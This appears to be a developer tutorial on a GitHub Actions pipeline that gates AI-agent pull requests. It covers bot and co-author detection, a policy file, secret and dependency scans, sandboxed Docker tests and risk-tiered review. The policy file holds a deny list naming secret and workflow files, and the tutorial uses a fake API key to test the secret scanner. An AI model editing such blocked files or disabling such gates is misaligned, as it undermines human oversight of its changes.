Lock Down AI Coding Agent Pipelines: Sandbox Configuration, Permission Boundaries, and Automated Review Gates
Before you begin
- GitHub Actions basics (creating and editing workflow YAML files)
- Familiarity with CI/CD concepts (pipelines, jobs, steps)
- Docker basics (building images, running containers)
- A GitHub repository where you can enable Actions
What you'll learn
- Detect AI-generated pull requests using commit metadata and labels
- Define a policy-as-code file that controls what AI agents can change
- Run automated security scans (secrets, dependencies, SAST) on every AI-generated PR
- Execute tests in an isolated Docker sandbox before merge
- Calculate a risk score and enforce tiered review requirements
- Emit structured audit events for compliance and incident response
On this page
This tutorial walks through setting up the ai-code-gate pipeline, a GitHub Actions workflow that detects AI-generated pull requests, enforces policy-as-code, runs security scans, executes tests in a sandbox, and gates merges by risk tier. For the broader strategy behind these controls, see the companion blog post: Securing AI Coding Agent Workflows.
The repository is modular: each pipeline stage is a standalone composite action you can adopt individually, and a shared TypeScript library (src/) contains the policy engine, detection logic, and risk scoring that the actions consume.
Step 1: Detect AI-Generated Pull Requests (10 min)
Before you can apply special controls, you need to know which pull requests came from an AI coding agent. Most agents leave fingerprints in commit metadata, author fields, or PR labels. This step builds a composite detection action that checks all three signals and sets an output flag the rest of the pipeline consumes.
Create the detection script
The script checks commit trailers for AI co-author patterns, known bot usernames, and PR labels. If any signal matches, it marks the PR as AI-generated and identifies the agent.
File: .github/actions/detect-ai-pr/detect.sh
#!/usr/bin/env bash
set -euo pipefail
IS_AI_PR="false"
AGENT_IDENTITY="none"
DETECTED_VIA="none"
# Check commit co-authors
COMMITS=$(git log --format="%B" origin/main..HEAD 2>/dev/null || git log --format="%B" -10)
check_co_author() {
local pattern="$1"
local agent="$2"
if echo "$COMMITS" | grep -qi "Co-Authored-By:.*${pattern}"; then
IS_AI_PR="true"
AGENT_IDENTITY="$agent"
DETECTED_VIA="co-author"
return 0
fi
return 1
}
check_co_author "anthropic\|claude" "claude" ||
check_co_author "copilot\|github" "copilot" ||
check_co_author "cursor" "cursor" ||
check_co_author "codex\|openai" "codex" ||
check_co_author "cody\|sourcegraph" "cody" || true
# Check PR labels
if [ "$IS_AI_PR" = "false" ] && [ -n "${PR_LABELS:-}" ]; then
IFS=',' read -ra LABELS <<< "$PR_LABELS"
for label in "${LABELS[@]}"; do
label_lower=$(echo "$label" | tr '[:upper:]' '[:lower:]')
case "$label_lower" in
ai-generated|copilot|claude|cursor|ai-code|bot)
IS_AI_PR="true"
DETECTED_VIA="label"
case "$label_lower" in
copilot) AGENT_IDENTITY="copilot" ;;
claude) AGENT_IDENTITY="claude" ;;
cursor) AGENT_IDENTITY="cursor" ;;
*) AGENT_IDENTITY="unknown" ;;
esac
break
;;
esac
done
fi
# Check PR author
if [ "$IS_AI_PR" = "false" ] && [ -n "${PR_AUTHOR:-}" ]; then
case "$PR_AUTHOR" in
*\[bot\])
IS_AI_PR="true"
DETECTED_VIA="author"
case "$PR_AUTHOR" in
*copilot*) AGENT_IDENTITY="copilot" ;;
*claude*) AGENT_IDENTITY="claude" ;;
*) AGENT_IDENTITY="unknown-bot" ;;
esac
;;
esac
fi
echo "is_ai_pr=$IS_AI_PR" >> "$GITHUB_OUTPUT"
echo "agent_identity=$AGENT_IDENTITY" >> "$GITHUB_OUTPUT"
echo "::notice::AI PR Detection: is_ai_pr=$IS_AI_PR, agent=$AGENT_IDENTITY, via=$DETECTED_VIA"
The detection logic is also available as a TypeScript module in src/detect.ts with exported functions like detectFromCoAuthors, detectFromLabels, and detectFromAuthor. The shell script is used in the composite action for zero-dependency execution.
Create the composite action
File: .github/actions/detect-ai-pr/action.yml
name: "Detect AI-Generated PR"
description: "Identifies pull requests created by AI coding agents via commit metadata, labels, and author checks"
outputs:
is_ai_pr:
description: "Whether the PR was generated by an AI agent"
value: ${{ steps.detect.outputs.is_ai_pr }}
agent_identity:
description: "The identified AI agent (claude, copilot, cursor, etc.)"
value: ${{ steps.detect.outputs.agent_identity }}
runs:
using: composite
steps:
- name: Detect AI PR
id: detect
shell: bash
run: bash ${{ github.action_path }}/detect.sh
env:
PR_LABELS: ${{ join(github.event.pull_request.labels.*.name, ',') }}
PR_AUTHOR: ${{ github.event.pull_request.user.login }}
The action reads PR_LABELS and PR_AUTHOR from environment variables set by the GitHub event context. No explicit inputs are needed because the action pulls everything from the event payload.
Claude Code adds a Co-Authored-By: Claude trailer to every commit by default. GitHub Copilot agent PRs come from dedicated bot accounts. Cursor and Aider typically include tool identifiers in commit messages. Checking all three signals gives you high coverage without false negatives.
If your team uses a different AI coding tool, add its commit signature to the check_co_author calls in detect.sh and to the AI_AGENT_PATTERNS map in src/detect.ts. The pattern is the same: look for co-author trailers, bot authors, or labels.
To verify this step works, push a commit with Co-Authored-By: Claude <noreply@anthropic.com> in the trailer and check the action output. The is_ai_pr output should be true and agent_identity should be claude.
Step 2: Define Your Policy File (10 min)
Policy-as-code is the foundation for everything else. Instead of relying on ad hoc review decisions, you define what AI agents are allowed to change, what they must never touch, and how much review different risk levels require. The policy file lives in the repo root so it is versioned alongside the code it governs.
Create the policy file
File: .ai-code-gate.yml
detection:
labels: ["ai-generated", "copilot", "claude"]
co_authors: ["*[bot]@*", "*noreply@anthropic.com"]
policy:
allowed_patterns:
- "src/**/*.ts"
- "src/**/*.tsx"
- "tests/**"
- "docs/**"
blocked_patterns:
- "*.env*"
- "**/auth/**"
- "docker-compose*.yml"
- ".github/workflows/**"
scope_limits:
max_files: 20
max_lines_added: 500
review:
risk_tiers:
low:
threshold: 30
approvals: 0
auto_merge: true
medium:
threshold: 70
approvals: 1
high:
threshold: 100
approvals: 2
require_security_team: true
audit:
enabled: true
output_format: json
retention_days: 90
Understand each section
The detection block defines which PR labels and co-author patterns signal an AI-generated PR. allowed_patterns and blocked_patterns use minimatch glob syntax to define what an AI agent can and cannot touch. If a PR modifies a file matching a blocked pattern, the pipeline fails immediately. scope_limits prevent an AI agent from submitting massive PRs that are difficult to review meaningfully: max_files caps the number of changed files and max_lines_added caps the total additions. The review.risk_tiers section maps risk score ranges to approval requirements. The audit section controls structured event logging and artifact retention.
The policy file is validated at runtime using a Zod schema (src/policy.ts) that provides defaults for every field. You can start with just a policy block and the rest fills in with sensible defaults.
Block CI/CD configuration files by default. An AI agent that can modify workflow YAML can potentially escalate its own permissions or disable the gates you are building here.
The repository includes three example configurations in the examples/ directory: a balanced default, a minimal evaluation config, and a strict regulated-environment config. You can also validate your policy file against the included JSON schema by running npx ajv validate -s schema/ai-code-gate.schema.json -d .ai-code-gate.yml.
Step 3: Run Policy Checks (10 min)
The policy check action reads the list of changed files from the GitHub API, compares every file against the allowed and blocked patterns, enforces scope limits, and writes a structured result for downstream steps.
The shared policy engine
The TypeScript policy engine lives in src/policy.ts and is imported by the composite action. It exports two key functions:
loadPolicyFromString(content)— parses YAML and validates it against the Zod schema, returning a typedPolicyobject with all defaults filled invalidateDiff(policy, changedFiles)— checks each changed file against allowed/blocked patterns and scope limits, returning aValidationResultwith apassedboolean and aviolationsarray
Each violation has a type (blocked_pattern, disallowed_file, or scope_exceeded), an optional file and pattern, and a human-readable message.
Create the policy check action
The composite action fetches the list of changed files from the GitHub Pull Request API, then runs them through the policy engine.
File: .github/actions/policy-check/check.ts
import { readFileSync, appendFileSync, existsSync } from "node:fs";
import { loadPolicyFromString, validateDiff, type ChangedFile } from "../../../src/policy.js";
const GITHUB_OUTPUT = process.env.GITHUB_OUTPUT ?? "";
const PR_NUMBER = process.env.PR_NUMBER ?? "";
const REPO = process.env.REPO ?? "";
const GITHUB_TOKEN = process.env.GITHUB_TOKEN ?? "";
async function getPrFiles(): Promise<ChangedFile[]> {
const response = await fetch(
`https://api.github.com/repos/${REPO}/pulls/${PR_NUMBER}/files`,
{
headers: {
Authorization: `Bearer ${GITHUB_TOKEN}`,
Accept: "application/vnd.github.v3+json",
},
},
);
if (!response.ok) {
throw new Error(`Failed to fetch PR files: ${response.status}`);
}
const files = (await response.json()) as Array<{
filename: string;
additions: number;
}>;
return files.map((f) => ({ path: f.filename, additions: f.additions }));
}
async function main() {
const policyPath = ".ai-code-gate.yml";
if (!existsSync(policyPath)) {
console.log("No .ai-code-gate.yml found, using default policy");
appendFileSync(GITHUB_OUTPUT, "policy_passed=true\n");
appendFileSync(GITHUB_OUTPUT, "violations_json=[]\n");
return;
}
const policyContent = readFileSync(policyPath, "utf-8");
const policy = loadPolicyFromString(policyContent);
const changedFiles = await getPrFiles();
console.log(`Checking ${changedFiles.length} files against policy...`);
const result = validateDiff(policy, changedFiles);
appendFileSync(
GITHUB_OUTPUT,
`policy_passed=${result.passed}\n`,
);
appendFileSync(
GITHUB_OUTPUT,
`violations_json=${JSON.stringify(result.violations)}\n`,
);
if (!result.passed) {
console.log(`::warning::Policy check failed with ${result.violations.length} violation(s)`);
for (const v of result.violations) {
console.log(` - ${v.message}`);
}
} else {
console.log("Policy check passed");
}
}
main().catch((err) => {
console.error(err);
process.exit(1);
});
File: .github/actions/policy-check/action.yml
name: "Policy Check"
description: "Validates PR changes against the .ai-code-gate.yml policy file"
outputs:
policy_passed:
description: "Whether all policy checks passed"
value: ${{ steps.check.outputs.policy_passed }}
violations_json:
description: "JSON array of policy violations"
value: ${{ steps.check.outputs.violations_json }}
runs:
using: composite
steps:
- name: Run policy check
id: check
shell: bash
run: npx tsx ${{ github.action_path }}/check.ts
env:
GITHUB_TOKEN: ${{ env.GITHUB_TOKEN }}
PR_NUMBER: ${{ github.event.pull_request.number }}
REPO: ${{ github.repository }}
Notice that the action fetches the file list from the GitHub API instead of parsing git diff output. This is more reliable because the API returns the canonical list of changed files for the PR, regardless of local checkout depth. The shared src/policy.ts module handles all pattern matching via minimatch with the dot: true option so dotfiles like .env are matched correctly.
Policy violations are logged as GitHub Actions warnings so reviewers see exactly which files and rules triggered the failure without digging through workflow logs.
To verify this step, modify a blocked file such as .github/workflows/release.yml in an AI-generated PR and observe the policy check failure in the action output.
Step 4: Run Automated Security Scanning (10 min)
Every AI-generated PR gets scanned for leaked secrets, vulnerable dependencies, and common code vulnerabilities. The scan orchestration script runs each tool if available, collects results, and produces pass/fail outputs for the risk assessment step.
Create the scan orchestration script
File: .github/actions/security-scan/scan.sh
#!/usr/bin/env bash
set -uo pipefail
FINDINGS=0
SCAN_PASSED="true"
RESULTS_DIR="$(mktemp -d)"
echo "=== AI Code Gate Security Scan ==="
# --- Gitleaks ---
echo ""
echo "--- Running Gitleaks ---"
if command -v gitleaks &>/dev/null; then
gitleaks detect --source=. --no-git --report-format=json --report-path="$RESULTS_DIR/gitleaks.json" 2>&1 || true
if [ -f "$RESULTS_DIR/gitleaks.json" ]; then
GL_COUNT=$(jq 'length' "$RESULTS_DIR/gitleaks.json" 2>/dev/null || echo "0")
FINDINGS=$((FINDINGS + GL_COUNT))
if [ "$GL_COUNT" -gt 0 ]; then
SCAN_PASSED="false"
echo "::warning::Gitleaks found $GL_COUNT secret(s)"
else
echo "Gitleaks: clean"
fi
fi
else
echo "Gitleaks not installed, skipping (install: https://github.com/gitleaks/gitleaks)"
fi
# --- Semgrep ---
echo ""
echo "--- Running Semgrep ---"
if command -v semgrep &>/dev/null; then
semgrep scan --config=auto --json --output="$RESULTS_DIR/semgrep.json" 2>&1 || true
if [ -f "$RESULTS_DIR/semgrep.json" ]; then
SG_COUNT=$(jq '.results | length' "$RESULTS_DIR/semgrep.json" 2>/dev/null || echo "0")
FINDINGS=$((FINDINGS + SG_COUNT))
if [ "$SG_COUNT" -gt 0 ]; then
SCAN_PASSED="false"
echo "::warning::Semgrep found $SG_COUNT finding(s)"
else
echo "Semgrep: clean"
fi
fi
else
echo "Semgrep not installed, skipping (install: https://semgrep.dev/docs/getting-started/)"
fi
# --- Dependency Audit ---
echo ""
echo "--- Running Dependency Audit ---"
if [ -f "package-lock.json" ] || [ -f "package.json" ]; then
npm audit --json > "$RESULTS_DIR/npm-audit.json" 2>&1 || true
if [ -f "$RESULTS_DIR/npm-audit.json" ]; then
VULN_COUNT=$(jq '.metadata.vulnerabilities.total // 0' "$RESULTS_DIR/npm-audit.json" 2>/dev/null || echo "0")
FINDINGS=$((FINDINGS + VULN_COUNT))
if [ "$VULN_COUNT" -gt 0 ]; then
echo "::warning::npm audit found $VULN_COUNT vulnerability(ies)"
else
echo "npm audit: clean"
fi
fi
elif [ -f "requirements.txt" ] || [ -f "Pipfile" ]; then
if command -v pip-audit &>/dev/null; then
pip-audit --format=json --output="$RESULTS_DIR/pip-audit.json" 2>&1 || true
else
echo "pip-audit not installed, skipping"
fi
fi
echo ""
echo "=== Scan Summary ==="
echo "Total findings: $FINDINGS"
echo "Scan passed: $SCAN_PASSED"
echo "scan_passed=$SCAN_PASSED" >> "$GITHUB_OUTPUT"
echo "findings_count=$FINDINGS" >> "$GITHUB_OUTPUT"
The script gracefully skips tools that are not installed on the runner using command -v checks. This means you can start using the action immediately and add tools incrementally: install gitleaks first, then Semgrep when you are ready, and the script adapts without failing. Each tool’s results are written to a temporary directory and counts are aggregated into a single findings_count output.
Create the scan action
File: .github/actions/security-scan/action.yml
name: "Security Scan"
description: "Runs gitleaks, Semgrep, and dependency audit scans on the PR"
outputs:
scan_passed:
description: "Whether all security scans passed"
value: ${{ steps.scan.outputs.scan_passed }}
findings_count:
description: "Total number of security findings"
value: ${{ steps.scan.outputs.findings_count }}
runs:
using: composite
steps:
- name: Run security scans
id: scan
shell: bash
run: bash ${{ github.action_path }}/scan.sh
The action itself is minimal: it delegates everything to scan.sh. There are no explicit install steps because the script handles missing tools gracefully. If you want gitleaks and Semgrep pre-installed on your runners, add installation steps to your workflow or use a custom runner image.
Secret detection is critical because a leaked key in an AI-generated PR can be exploited before any human reviewer opens the diff. Even a single secret finding sets scan_passed=false and contributes heavily to the risk score.
The dependency audit automatically detects whether the project uses npm or pip. For Node.js projects, it runs npm audit. For Python projects, it uses pip-audit if available.
To verify this step, add a hardcoded API key like const API_KEY = "sk-live-abc123def456ghi789" to a source file in an AI-generated PR and observe gitleaks catching it in the scan output.
Step 5: Execute Tests in a Sandbox (10 min)
Running tests from AI-generated code on bare runners is risky. The code might make network calls, write to shared filesystems, or consume unbounded resources. This step builds and runs tests inside a Docker container with network disabled and CPU and memory capped.
Create the sandbox Dockerfile
File: .github/actions/sandbox-test/Dockerfile
FROM node:20-slim
WORKDIR /app
# Copy package files first for layer caching
COPY package.json package-lock.json* ./
RUN npm ci --ignore-scripts 2>/dev/null || npm install --ignore-scripts
# Copy source
COPY . .
# Run tests (network will be disabled at runtime via --network=none)
CMD ["npm", "test"]
The --ignore-scripts flag prevents lifecycle scripts from running during install, which blocks a common supply-chain attack vector where a compromised dependency executes arbitrary code at install time. Network isolation is enforced at the Docker runtime level, not in the Dockerfile.
Create the sandbox test action
File: .github/actions/sandbox-test/action.yml
name: "Sandboxed Test Execution"
description: "Builds and runs tests in an isolated Docker container with network and resource restrictions"
outputs:
tests_passed:
description: "Whether all tests passed in the sandbox"
value: ${{ steps.sandbox.outputs.tests_passed }}
test_output:
description: "Test execution output"
value: ${{ steps.sandbox.outputs.test_output }}
runs:
using: composite
steps:
- name: Build sandbox image
shell: bash
run: docker build -t ai-code-gate-sandbox -f ${{ github.action_path }}/Dockerfile .
- name: Run tests in sandbox
id: sandbox
shell: bash
run: |
set +e
OUTPUT=$(docker run \
--network=none \
--memory=512m \
--cpus=1 \
--rm \
ai-code-gate-sandbox 2>&1)
EXIT_CODE=$?
set -e
echo "test_output<<EOF" >> "$GITHUB_OUTPUT"
echo "$OUTPUT" >> "$GITHUB_OUTPUT"
echo "EOF" >> "$GITHUB_OUTPUT"
if [ $EXIT_CODE -eq 0 ]; then
echo "tests_passed=true" >> "$GITHUB_OUTPUT"
echo "Sandbox tests passed"
else
echo "tests_passed=false" >> "$GITHUB_OUTPUT"
echo "::warning::Sandbox tests failed (exit code $EXIT_CODE)"
fi
echo "$OUTPUT"
The --network=none flag prevents any outbound connections. The --memory=512m and --cpus=1 flags cap resource usage so AI-generated code cannot consume unbounded runner resources. The --rm flag removes the container after execution. The test output is captured as an action output so the risk assessment step can reference it.
The sandbox runs the repository’s existing npm test command. The sample-app/ directory in the ai-code-gate repository contains a minimal Express API with health and items endpoints that demonstrates the pipeline end to end.
To verify this step, push a failing test in an AI-generated PR and observe the tests_passed=false output. The full test output is available in the action log.
Step 6: Calculate Risk and Enforce Review Gates (5 min)
Risk assessment combines signals from the policy check, security scans, and test results into a single score. The score maps to a review tier that controls how many approvals are required before the PR can merge.
The shared risk engine
The risk scoring logic lives in src/risk.ts and uses a weighted, additive model with per-category caps:
| Category | Points per finding | Cap |
|---|---|---|
| Policy violations | +30 per violation | 40 |
| Secret findings | +50 per finding | 50 |
| Dependency vulnerabilities (critical) | +40 each | 50 (combined) |
| Dependency vulnerabilities (high) | +25 each | 50 (combined) |
| Dependency vulnerabilities (moderate) | +15 each | 50 (combined) |
| Dependency vulnerabilities (low) | +5 each | 50 (combined) |
| SAST errors | +20 each | 40 (combined) |
| SAST warnings | +10 each | 40 (combined) |
| Test failures | +30 | 30 |
| Scope exceeded | +20 | 20 |
The total score is capped at 100. The calculateRiskScore function returns a RiskResult with the numeric score, the tier (LOW, MEDIUM, or HIGH), and a full breakdown by category.
Create the risk assessment action
The composite action takes inputs from the upstream jobs (policy, scan, sandbox), runs them through the risk engine, and posts a formatted PR comment.
File: .github/actions/risk-assessment/assess.ts
import { writeFileSync, appendFileSync } from "node:fs";
import { calculateRiskScore, formatRiskComment, type RiskInputs } from "../../../src/risk.js";
const GITHUB_OUTPUT = process.env.GITHUB_OUTPUT ?? "";
const POLICY_PASSED = process.env.POLICY_PASSED === "true";
const SCAN_PASSED = process.env.SCAN_PASSED === "true";
const FINDINGS_COUNT = parseInt(process.env.FINDINGS_COUNT ?? "0", 10);
const TESTS_PASSED = process.env.TESTS_PASSED === "true";
const VIOLATIONS_JSON = process.env.VIOLATIONS_JSON ?? "[]";
const GITHUB_TOKEN = process.env.GITHUB_TOKEN ?? "";
const PR_NUMBER = process.env.PR_NUMBER ?? "";
const REPO = process.env.REPO ?? "";
async function postComment(body: string) {
if (!GITHUB_TOKEN || !PR_NUMBER || !REPO) {
console.log("Skipping PR comment (missing GitHub context)");
return;
}
const response = await fetch(
`https://api.github.com/repos/${REPO}/issues/${PR_NUMBER}/comments`,
{
method: "POST",
headers: {
Authorization: `Bearer ${GITHUB_TOKEN}`,
Accept: "application/vnd.github.v3+json",
"Content-Type": "application/json",
},
body: JSON.stringify({ body }),
},
);
if (!response.ok) {
console.error(`Failed to post PR comment: ${response.status}`);
}
}
async function main() {
let violations: unknown[] = [];
try {
violations = JSON.parse(VIOLATIONS_JSON);
} catch {
violations = [];
}
const inputs: RiskInputs = {
policyViolations: POLICY_PASSED ? 0 : violations.length || 1,
scanFindings: {
secrets: SCAN_PASSED ? 0 : Math.max(FINDINGS_COUNT, 1),
dependencies: { low: 0, moderate: 0, high: 0, critical: 0 },
sast: { warnings: 0, errors: 0 },
},
testsPassed: TESTS_PASSED,
scopeExceeded: false,
};
const result = calculateRiskScore(inputs);
const comment = formatRiskComment(result);
console.log(`Risk Score: ${result.score}/100`);
console.log(`Risk Tier: ${result.tier}`);
// Write outputs
appendFileSync(GITHUB_OUTPUT, `risk_score=${result.score}\n`);
appendFileSync(GITHUB_OUTPUT, `risk_tier=${result.tier}\n`);
// Write audit event
const auditEvent = {
timestamp: new Date().toISOString(),
event: "risk-assessment",
pr_number: PR_NUMBER,
repository: REPO,
risk_score: result.score,
risk_tier: result.tier,
breakdown: result.breakdown,
policy_passed: POLICY_PASSED,
scan_passed: SCAN_PASSED,
tests_passed: TESTS_PASSED,
findings_count: FINDINGS_COUNT,
violations_count: violations.length,
};
writeFileSync("audit-event.json", JSON.stringify(auditEvent, null, 2));
// Post PR comment
await postComment(comment);
}
main().catch((err) => {
console.error(err);
process.exit(1);
});
File: .github/actions/risk-assessment/action.yml
name: "Risk Assessment"
description: "Calculates risk score from pipeline results and posts a formatted PR comment"
inputs:
policy_passed:
description: "Whether policy checks passed"
required: true
scan_passed:
description: "Whether security scans passed"
required: true
findings_count:
description: "Number of security findings"
required: true
tests_passed:
description: "Whether sandbox tests passed"
required: true
violations_json:
description: "JSON array of policy violations"
required: false
default: "[]"
outputs:
risk_score:
description: "Calculated risk score (0-100)"
value: ${{ steps.assess.outputs.risk_score }}
risk_tier:
description: "Risk tier (LOW, MEDIUM, HIGH)"
value: ${{ steps.assess.outputs.risk_tier }}
runs:
using: composite
steps:
- name: Calculate risk
id: assess
shell: bash
run: npx tsx ${{ github.action_path }}/assess.ts
env:
POLICY_PASSED: ${{ inputs.policy_passed }}
SCAN_PASSED: ${{ inputs.scan_passed }}
FINDINGS_COUNT: ${{ inputs.findings_count }}
TESTS_PASSED: ${{ inputs.tests_passed }}
VIOLATIONS_JSON: ${{ inputs.violations_json }}
GITHUB_TOKEN: ${{ env.GITHUB_TOKEN }}
PR_NUMBER: ${{ github.event.pull_request.number }}
REPO: ${{ github.repository }}
The action takes all upstream results as explicit inputs so it works in a parallel-job workflow where each upstream job runs independently. The formatRiskComment function from src/risk.ts generates a PR comment with a score breakdown table.
The three tiers work as follows. LOW (0-30): the PR auto-merges because scans are clean, tests pass, and the diff is small. MEDIUM (31-70): at least one human reviewer must approve before merge. HIGH (71-100): two reviewers are required and one must be from the security team.
The risk score is additive with per-category caps. A single leaked secret (50 points) plus failing tests (30 points) lands at 80, well into the HIGH tier. This ensures that any combination of serious findings triggers the strictest review tier.
To verify this step, check the PR comment for the risk score and tier. A clean PR with passing tests should show a LOW tier.
Step 7: Wire Up the Workflow and Audit Logging (5 min)
The top-level workflow connects all five composite actions into a parallel-job pipeline. Policy checks, security scans, and sandbox tests run concurrently after detection. Risk assessment runs last, after all upstream jobs complete, using always() so it runs even if an upstream job fails.
Create the workflow
File: .github/workflows/ai-code-gate.yml
name: AI Code Gate
on:
pull_request:
types: [opened, synchronize, reopened]
permissions:
contents: read
pull-requests: write
issues: write
jobs:
detect:
name: Detect AI-Generated PR
runs-on: ubuntu-latest
outputs:
is_ai_pr: ${{ steps.detect.outputs.is_ai_pr }}
agent_identity: ${{ steps.detect.outputs.agent_identity }}
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- uses: ./.github/actions/detect-ai-pr
id: detect
- run: echo "AI PR detected=${{ steps.detect.outputs.is_ai_pr }}, agent=${{ steps.detect.outputs.agent_identity }}"
policy-check:
name: Policy Check
needs: detect
if: needs.detect.outputs.is_ai_pr == 'true'
runs-on: ubuntu-latest
outputs:
policy_passed: ${{ steps.policy.outputs.policy_passed }}
violations_json: ${{ steps.policy.outputs.violations_json }}
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
with:
node-version: "20"
- run: npm ci
- uses: ./.github/actions/policy-check
id: policy
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
security-scan:
name: Security Scan
needs: detect
if: needs.detect.outputs.is_ai_pr == 'true'
runs-on: ubuntu-latest
outputs:
scan_passed: ${{ steps.scan.outputs.scan_passed }}
findings_count: ${{ steps.scan.outputs.findings_count }}
steps:
- uses: actions/checkout@v4
- uses: ./.github/actions/security-scan
id: scan
sandbox-test:
name: Sandboxed Test Execution
needs: detect
if: needs.detect.outputs.is_ai_pr == 'true'
runs-on: ubuntu-latest
outputs:
tests_passed: ${{ steps.sandbox.outputs.tests_passed }}
steps:
- uses: actions/checkout@v4
- uses: ./.github/actions/sandbox-test
id: sandbox
risk-assessment:
name: Risk Assessment
needs: [detect, policy-check, security-scan, sandbox-test]
if: always() && needs.detect.outputs.is_ai_pr == 'true'
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
with:
node-version: "20"
- run: npm ci
- uses: ./.github/actions/risk-assessment
id: assess
with:
policy_passed: ${{ needs.policy-check.outputs.policy_passed || 'false' }}
scan_passed: ${{ needs.security-scan.outputs.scan_passed || 'false' }}
findings_count: ${{ needs.security-scan.outputs.findings_count || '0' }}
tests_passed: ${{ needs.sandbox-test.outputs.tests_passed || 'false' }}
violations_json: ${{ needs.policy-check.outputs.violations_json || '[]' }}
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: Upload audit log
uses: actions/upload-artifact@v4
with:
name: ai-code-gate-audit
path: audit-event.json
retention-days: 90
Key architectural decisions
Parallel jobs over sequential steps. Policy checks, security scans, and sandbox tests all depend only on the detect job, so they run concurrently. This cuts wall-clock time significantly for AI-generated PRs compared to a sequential pipeline.
always() on risk assessment. The risk assessment job runs even when upstream jobs fail. If policy checks or scans fail, the risk assessment receives 'false' for the failed job’s outputs (via the || 'false' fallback) and incorporates that into the score. This ensures every AI-generated PR gets a risk assessment and a PR comment regardless of individual stage failures.
Audit as an artifact. The risk assessment action writes audit-event.json with the full assessment details: timestamp, PR number, repository, risk score, tier, breakdown, and the pass/fail status of each upstream stage. This file is uploaded as a GitHub Actions artifact with 90-day retention. For regulated environments, forward these events to your SIEM using a post-job webhook or a separate forwarding workflow.
Audit event example
A complete audit event looks like this:
{
"timestamp": "2026-03-14T14:25:45Z",
"event": "risk-assessment",
"pr_number": "42",
"repository": "acme/payments-api",
"risk_score": 0,
"risk_tier": "LOW",
"breakdown": {
"policy": 0,
"secrets": 0,
"dependencies": 0,
"sast": 0,
"tests": 0,
"scope": 0
},
"policy_passed": true,
"scan_passed": true,
"tests_passed": true,
"findings_count": 0,
"violations_count": 0
}
Set artifact retention to 90 days or longer to satisfy most compliance frameworks. The audit.retention_days field in your .ai-code-gate.yml documents your intended retention policy alongside the enforcement configuration.
To verify this step, trigger the full workflow on an AI-generated PR, then download the audit artifact from the Actions run. You should see the audit-event.json file in the ai-code-gate-audit artifact.
Using Individual Actions in Your Own Repo
Each composite action can be referenced independently from any repository. You do not need to adopt the full pipeline. To add just detection and policy checks to an existing workflow:
jobs:
detect:
runs-on: ubuntu-latest
outputs:
is_ai_pr: ${{ steps.detect.outputs.is_ai_pr }}
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- uses: InkByteStudio/ai-code-gate/.github/actions/detect-ai-pr@main
id: detect
policy-check:
needs: detect
if: needs.detect.outputs.is_ai_pr == 'true'
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
with:
node-version: "20"
- uses: InkByteStudio/ai-code-gate/.github/actions/policy-check@main
Add an .ai-code-gate.yml to your repo root to configure policy rules (see examples/ in the repository for starter configurations).
Common Setup Problems
Gitleaks reports false positives on test fixtures
- Symptom: Gitleaks flags example API keys in test files or documentation.
- Cause: Test fixtures contain strings that match secret patterns.
- Fix: Add a
.gitleaks.tomlfile with[allowlist]rules targeting specific paths or regex patterns for known test values.
Docker build fails in the sandbox step
- Symptom: The sandbox Dockerfile cannot install dependencies or the build context is too large.
- Cause: Missing
.dockerignorefile causesnode_modules,.git, or other large directories to be copied into the build context. - Fix: Add a
.dockerignorethat excludesnode_modules,.git,dist, and any scan output directories.
Detection always returns false
- Symptom: The
is_ai_proutput is alwaysfalseeven for known AI-generated PRs. - Cause: Shallow clone depth does not include enough history to inspect commit messages, or the AI tool does not add a
Co-Authored-Bytrailer. - Fix: Ensure
fetch-depth: 0in the checkout step. For tools that do not add trailers, use PR labels as the primary detection signal by adding the appropriate label to your PR.
Sandbox tests time out
- Symptom: The sandbox step runs for the full duration and then fails.
- Cause: Tests are making blocked network calls that hang, or the test suite is too large for the 512MB memory limit.
- Fix: Configure your test runner to skip integration tests that require network access. If the memory limit is the issue, adjust the
--memoryflag in the sandbox action.
Risk score is always zero
- Symptom: Every AI-generated PR gets a LOW risk score regardless of content.
- Cause: Upstream job outputs are not being passed correctly to the risk assessment job.
- Fix: Verify that each upstream job declares its
outputsblock and that the risk assessment job references them with the|| 'false'fallback pattern shown in the workflow above.
Wrap-Up
You now have a complete AI coding agent governance pipeline with five modular composite actions: AI-generated PR detection using commit metadata, bot authors, and labels; policy-as-code enforcement with allowed and blocked file patterns and scope limits; automated security scanning with gitleaks, npm audit, and Semgrep; sandboxed test execution in a network-isolated, resource-limited Docker container; and risk-tiered review gates with structured audit logging.
The pipeline runs policy checks, security scans, and sandbox tests in parallel, then combines all results into a single risk score that determines review requirements. Every run produces a structured audit event uploaded as a GitHub Actions artifact.
The ai-code-gate on GitHub repository contains all the actions, shared TypeScript modules, tests, example policies, and the complete workflow. For the broader strategy and threat model behind these controls, see the companion blog post: Securing AI Coding Agent Workflows.
Get the free AI Code Governance Checklist →
Related tutorials that extend this work:
- Harden CI/CD with Sigstore, SLSA, SBOMs covers artifact signing, provenance, and supply-chain verification gates for the artifacts your pipeline produces.
- Secure Agentic AI Apps covers guardrails, tool permissions, and audit logging for agentic AI applications that call tools and take actions.
Governance is the missing layer between AI coding tool adoption and enterprise readiness. Teams that ship AI-generated code without detection, policy enforcement, security scanning, sandboxed testing, and risk-based review are accepting unquantified risk. The pipeline you built here makes that risk visible, measurable, and enforceable.
Related Articles
How to Audit and Lock Down APIs Using the OWASP API Security Top 10
Learn how to audit and lock down APIs using the OWASP API Security Top 10 with a practical review workflow, code checks, and a remediation plan.
Build, Secure, and Deploy a Custom MCP Server: From Tool Definition to Production
Step-by-step tutorial to build an MCP server beyond hello-world with PostgreSQL, authentication, query sandboxing, and Docker deployment.
How to Secure an Agentic AI App: Guardrails, Tool Permissions, and Audit Logs
Learn how to secure an agentic AI app with guardrails, per-tool permissions, user approvals, and audit logs using a practical production-ready baseline.